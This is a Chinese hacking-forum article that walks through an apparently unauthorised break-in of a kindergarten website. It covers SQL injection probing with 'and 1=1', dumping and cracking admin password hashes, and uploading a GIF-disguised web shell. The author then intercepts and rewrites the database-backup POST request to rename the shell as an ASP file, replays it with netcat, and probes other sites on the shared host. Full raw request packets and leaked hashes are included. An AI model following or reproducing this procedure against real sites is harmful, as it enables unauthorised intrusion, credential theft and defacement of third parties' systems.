首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
通过后台抓包备份拿webshell渗透实战
来源:[B.H.S.T] 作者:2h0ngHe 发布时间:2010-12-13  

在网上无聊搜索幼儿园,找到个网站。
http://www.xxxxxx.com/


一看页面还不错,不过乱了点。
随便点进去一个链接,http://www.xxxxxx.com/view_new.asp?id=204&cid=24
随便加个and 1=1和and 1=2 貌似都过滤了,全部返回正常页面。
去掉后面的"&cid=2" 回车后再次检查and 1=1 和and 1=2
返回不同页面,确定有注入漏洞。


懒得手工了,这种漏洞简单,直接丢进domain猜解。
果然access的数据库。进一步猜解:(插入代码发帖就说字符不够啊!)
========================================
恭喜,该URL可以注入!
数据库类型:Access数据库
提示1: 所有表名已猜解完毕!
提示2: 所有列名已猜解完毕!
范围:共有5条记录!
password内容:4139bf7cbbc3a1fb
password内容:4139bf7cbbc3a1fb
password内容:e034b3929bbe2d5b
password内容:ef58d7605c06bb3a
password内容:f77f6b2d4ed4a2f0
已全部检测完毕!
=======================================
把第一个密码拿去xmd5.org 人品不错,有记录195802
兴冲冲地扫描后台,人品继续上升一下子找到了。
http://www.xxxxxx.com/admin/
输入账号admin密码195802,页面变成空白?地址是admin/login.asp
难不成管理员删掉了login.asp?
不着急,用Wwwscan扫描一下后台地址。
得到个http://www.xxxxxx.com/admin/left.htm
进入后发现是导航栏!


有戏!
先去添加个文章,呵呵有上传功能。
修改个小马头部加上gif89a,后缀改成.gif上传成功了!
得到地址是../userpic/201012514755680.gif


既然有了导航栏,看看数据库备份功能。
http://www.xxxxxx.com/admin/dbback.asp
发现路径无法修改!



作为一名菜鸟,正准备哀叹人品并放弃时,忽然想起这种数据库备份的限制应该可以通过抓包改包突破!
尝试使用winsock抓包。


抓包内容为:
============================================

POST /admin/dbback.asp?action=back HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.xxxxxx.com/admin/dbback.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 665; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Host: www.xxxxxx.com
Content-Length: 72
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQABDDRCD=GAGLCDDBNNDBALIBKBGPNNKGcurrf=date%2Fdata.asp&backf=dbback&backfy=backup.mdb&Submit=%B1%B8%B7%DD

==============================================

呵呵,尾部果然出现了路径、名称!
防止万一,用URL编码一下得到图片马地址%2E%2E%2Fuserpic%2F201012514755680.gif
把backup.mdb改为safe.asp
然后看一下程度,把length改成93
改好的包如下:
=====================================================

POST /admin/dbback.asp?action=back HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.xxxxxx.com/admin/dbback.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 665; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; CIBA; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Host: www.xxxxxx.com
Content-Length: 72
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQABDDRCD=GAGLCDDBNNDBALIBKBGPNNKGcurrf=%2E%2E%2Fuserpic%2F201012514755680.gif&backf=dbback&backfy=safe.asp&Submit=%B1%B8%B7%DD

=======================================================

看一下端口20480

拿出终极武器nc!
cmd下输入命令nc www.xxxxxx.com 20480 < nc.txt (nc.txt为数据包)
稍等一会儿。
进入小马地址:http://www.xxxxxx.com/admin/dbback/safe.asp
呵呵,webshell到手了!


传个大马看一下,貌似是虚拟主机。
用rootkit.net.cn旁注一下


发现绑定了大量站点!
呵呵,进其他站点看看,几乎都有类似这个漏洞利用过程:注入-猜解-后台(admin/login.asp)-图片-数据库备份(没有的话那就算啦- -)
注入漏洞满天飞啊!我就不玩啦~弄这么多傻瓜webshell也没用。
国内这种傻瓜漏洞估计不少,还是提醒广大站长朋友提高安全意识!少说过滤下and 1=1啊(-_-!)

 

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·渗透技巧总结
·一次有意思的提权(G6FTP )
·利用ewebeditor 5.5 - 6.0 鸡肋
·星外虚拟机系统(星外虚拟机提权"
·对搜狐、网易和TOM三大门户网站
·oracle低权限下获取shell
·GRE数据包注入攻击
·暴力破解asp一句话[php版]
·社会工程+老式提权艰难渗透某通
·艰难渗透源码出售站点(图文)
·典型性社会工程学渗透实战(图文
·时间和状态:利用漏洞改变游戏角
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved